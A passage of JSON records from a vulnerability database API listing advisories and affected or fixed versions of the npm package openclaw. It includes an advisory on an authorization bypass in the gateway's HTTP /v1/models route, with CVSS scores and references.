                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35643",
                "GHSA-cxmw-p77q-wchg"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nf6w-v1pc-mbe5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90846?format=api",
            "vulnerability_id": "VCID-nfva-pukn-uqch",
            "summary": "OpenClaw has a Gateway HTTP /v1/models Route Bypasses Operator Read Scope\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe OpenAI-compatible HTTP endpoint `/v1/models` accepts bearer auth but does not enforce operator method scopes.\n\nIn contrast, the WebSocket RPC path enforces `operator.read` for `models.list`.\n\nA caller connected with `operator.approvals` (no read scope) is rejected for `models.list` (`missing scope: operator.read`) but can still enumerate model metadata through HTTP `/v1/models`.\n\nConfirmed on current `main` at commit `06de515b6c42816b62ec752e1c221cab67b38501`.\n\n## Details\n\nThe WS control-plane path enforces role/scope checks centrally before dispatching methods. For non-admin operators, this includes required method scopes such as `operator.read` for `models.list`.\n\nThe HTTP compatibility path for `/v1/models` performs bearer authorization and then returns model metadata; it does not apply an equivalent scope check.\n\nAs reproduced, a caller with only `operator.approvals` can:\n\n1. connect successfully,\n2. fail `models.list` over WS with `missing scope: operator.read`,\n3. fetch `/v1/models` over HTTP with status 200 and model data.\n\nThis is a cross-surface authorization inconsistency where the stricter WS policy can be bypassed via HTTP.\n\n## Impact\n\n- Callers lacking `operator.read` can still enumerate gateway model metadata through HTTP compatibility routes.\n- Breaks scope model consistency between WS RPC and HTTP surfaces.\n- Weakens least-privilege expectations for operators granted non-read scopes.\n\n## Patch Suggestion\n\n### 1) Enforce read scope on `/v1/models` routes\n\nApply a scope gate equivalent to `models.list` before serving `/v1/models` or `/v1/models/:id`.\n\n### 2) Reuse centralized scope-authorization helper for HTTP compatibility endpoints\n\nUse the same operator scope logic used by WS dispatch (`authorizeOperatorScopesForMethod(...)`) to prevent policy drift.\n\n### 3) Add regression tests\n\nKeep this PoC and add explicit negative/positive controls:\n\n- `operator.approvals` without read is rejected on HTTP `/v1/models`.\n- `operator.read` is accepted on both WS `models.list` and HTTP `/v1/models`.\n\n## Credit\n\nReported by @zpbrent.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35619",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11019",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10977",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11011",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35619"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35619",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35619"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-68f8-9mhj-h2mp",
                    "reference_id": "GHSA-68f8-9mhj-h2mp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-68f8-9mhj-h2mp"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
